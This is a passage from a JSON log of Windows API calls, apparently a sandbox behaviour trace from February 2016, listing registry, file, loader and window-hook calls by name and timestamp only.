{"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": 
"2016-02-16 17:42:08,120", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", 
"timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,120", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,120", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": 
"2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": 
"registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": 
"2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 
17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,130", "api": "CreateThread"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "SetWindowsHookExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "SetWindowsHookExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,130", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExA"}, {"category": "windows", "timestamp": "2016-02-16 17:42:08,130", "api": "FindWindowW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,130", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,130", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", 
"api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 